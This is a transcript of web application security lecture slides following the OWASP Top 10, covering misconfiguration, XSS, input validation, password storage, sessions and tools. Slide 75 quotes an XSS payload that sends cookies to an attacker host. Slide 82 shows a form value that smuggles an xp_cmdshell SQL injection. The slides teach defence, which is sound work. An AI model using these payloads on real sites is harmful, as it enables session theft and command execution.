  • 64. How to Prevent • review and update the configurations appropriate to all security notes • review cloud storage permissions (e.g. S3 bucket permissions). • A segmented application architecture à separation between components or tenants, with segmentation, containerization, or cloud security groups. • Sending security directives to clients, e.g. Security Headers. • An automated process to verify the effectiveness of the configurations and settings in all environments. www.cert.or.id/
  • 65. Example Attack Scenarios • Scenario #1: The application server comes with sample applications that are not removed from the production server. • These sample applications have known security flaws attackers use to compromise the server. • If one of these applications is the admin console, and default accounts weren’t changed the attacker logs in with default passwords and takes over.
  • 66. Scenario #2 • Directory listing is not disabled on the server. • An attacker discovers they can simply list directories. • The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. • The attacker then finds a serious access control flaw in the application. www.cert.or.id/
  • 67. Scenario #3 • The application server’s configuration allows detailed error messages, e.g. stack traces, to be returned to users. • This potentially exposes sensitive information or underlying flaws such as component versions that are known to be vulnerable.
  • 68. Scenario #4 • A cloud service provider has default sharing permissions open to the Internet by other CSP users. • This allows sensitive data stored within cloud storage to be accessed. www.cert.or.id/
  • 69. 7. Cross Site Scripting OWASP Top 10
  • 70. Cross-Site Scripting (XSS) • Reflected XSS • DOM XSS • Stored XSS • The impact of XSS is moderate for reflected and DOM XSS, • Severe for stored XSS, • remote code execution on the victim's browser, • stealing credentials, sessions, delivering malware to the victim
  • 71. Reflected XSS • The application or API includes unvalidated and unescaped user input as part of HTML output. • A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. • Typically the user will need to interact with some malicious link that points to an attacker- controlled page, such as malicious watering hole websites, advertisements, or similar. www.cert.or.id/
  • 72. • Stored XSS: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk. • DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.
  • 73. Impact • session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks. www.cert.or.id/
  • 74. How to Prevent • Using frameworks that automatically escape XSS by design • the latest Ruby on Rails, React JS • Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities • Applying context-sensitive encoding when modifying the browser document on the client side acts against DOM XSS.
  • 75. Example Attack Scenario • Scenario 1: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: • (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; • The attacker modifies the ‘CC’ parameter in the browser to: • '><script>document.location= 'http://www.attacker.com/cgi- bin/cookie.cgi? foo='+document.cookie</script>'. • This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. www.cert.or.id/
  • 77. Principle • Input Validation • Attack Surface reduction www.cert.or.id/
  • 78. Input Validation • Never Trust the User • Validate the data they input • Explicitly describe the format of a valid request input
  • 79. Blacklist Validation • Make list of all invalid input à block anything on the list • Impossible to get all invalid input in the list
  • 80. Whitelist Validation • List all that allowed www.cert.or.id/
  • 81. Case 1 • Drop down menu & radio button • What is you favourite color? oRed oBlue oGreen • Is It safe?
  • 82. • Browser à Http request à Web Application POST /color.php HTTP/1.1 Host: www.example.xxx Content-Length:27 Content-Type: application/x-www-form-urlencoded Color=Red à Attacker can modify this Color=White ; Color= ‘;Exec+xp_cmdshell+‘...‘ www.cert.or.id/
  • 83. Principle of least priviledge • Only provide user with permission that allow him to accomplish what he need to do, and no more • Every new feature, add potential vulnerability • Minimize user permission • Minimize capability programming calls and object
  • 84. Challenge • Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. • Microservices come with their own security challenges including establishing trust between microservices, containers, secret management, etc. • Old code never expected to be accessible from the Internet is now sitting behind an API or RESTful web service to be consumed by Single Page Applications (SPAs) and mobile applications. • Architectural assumptions by the code, such as trusted callers, are no longer valid. www.cert.or.id/
  • 85. Challenge • Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular feature-rich front ends. • Client-side functionality that has traditionally been delivered server- side brings its own security challenges. • JavaScript is now the primary language of the web with node.js running server side and modern web frameworks such as Bootstrap, Electron, Angular, and React running on the client.
  • 86. Classifying and Prioritizing Threats • STRIDE: threat Classification system (Microsoft) • Spoofing • Tampering • Repudiation • Information Disclosure • Denial Of Service • Elevation of Priviledge www.cert.or.id/
  • 87. CWE • Common Weakness Enumeration • List of software vulnerability • MITRE
  • 88. Password Attack • Brute Force • Dictionary Attack www.cert.or.id/
  • 89. Password Best Practice • Minimum Password Length • Enforce Password Complexity • Rotate Password (90 D) • Password Uniqueness • Password = Username? • Properly store password
  • 90. Storing Password • Dont store in Plaintext • Use a strong Hash • SHA 256; SHA 512 • MD5, SHA1 • 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D15 42D8 • Use Salt www.cert.or.id/
  • 91. Salt • Random generated number • Added to password • 64 bit
  • 92. Authentication • Password Based • Single-sign On • Multi Factor Authentication www.cert.or.id/
  • 93. Authentication • Access protected resource • Session ID
  • 94. Securing Authentication • SSL/TLS • Account Lockout (failed login) • Number of attempt • Window of measurement • Lockout Period • CAPTCHA (completely automated public turing test to tell Computers & Human Apart) – brute force • No Default account • Dont hard code credential • Remember me à cookies expiration www.cert.or.id/
  • 95. Session Management: • sequence of network HTTP request and response transactions associated to the same user • Session Timeout (4 hours) • Idle Session Timeout (20 Minutes) • Limit the session concurrency
  • 96. ACL : Access Control List • Permission • Read Write Execute www.cert.or.id/
  • 98. Technology • Secure network • Secure Host • Application
  • 99. WAF • Web Application Firewall • Filter, Monitor, block Http traffic to web application • Barracuda Network WAF • Fortinet Fortiweb • Cloudfare • Cloudbric • ModSecurity • Naxsi www.cert.or.id/
  • 100. Tools – Web Scanner • Nikto • BurpSuite • Acunetix • Owasp Zap • W3af • Nessus • OpenVAS • Lynis www.cert.or.id/
  • 101. Learning Material • DVWA (Damn Vulnerable Web Application) • Webgoat • Multillidae • Owasp Juice Shop • bwapp • Hackthissite • Hackthis • Altoro Mutual
  • 102. Reference • Zalewski, M. (2011). The tangled Web: A guide to securing modern web applications. No Starch Press. • Sullivan, B., & Liu, V. (2011). Web application security, a beginner's guide. McGraw-Hill Education Group. • OWASP: https://www.owasp.org/index.php/Main_Page • Local Chapter: https://www.owasp.org/index.php/Catalunya • CERT Secure Coding
  • 103. Terima Kasih jul [at] tass.telkomuniversity.ac.id jul_ismail Blog: julismail.staff.telkomuniversity.ac.id www.cert.or.id/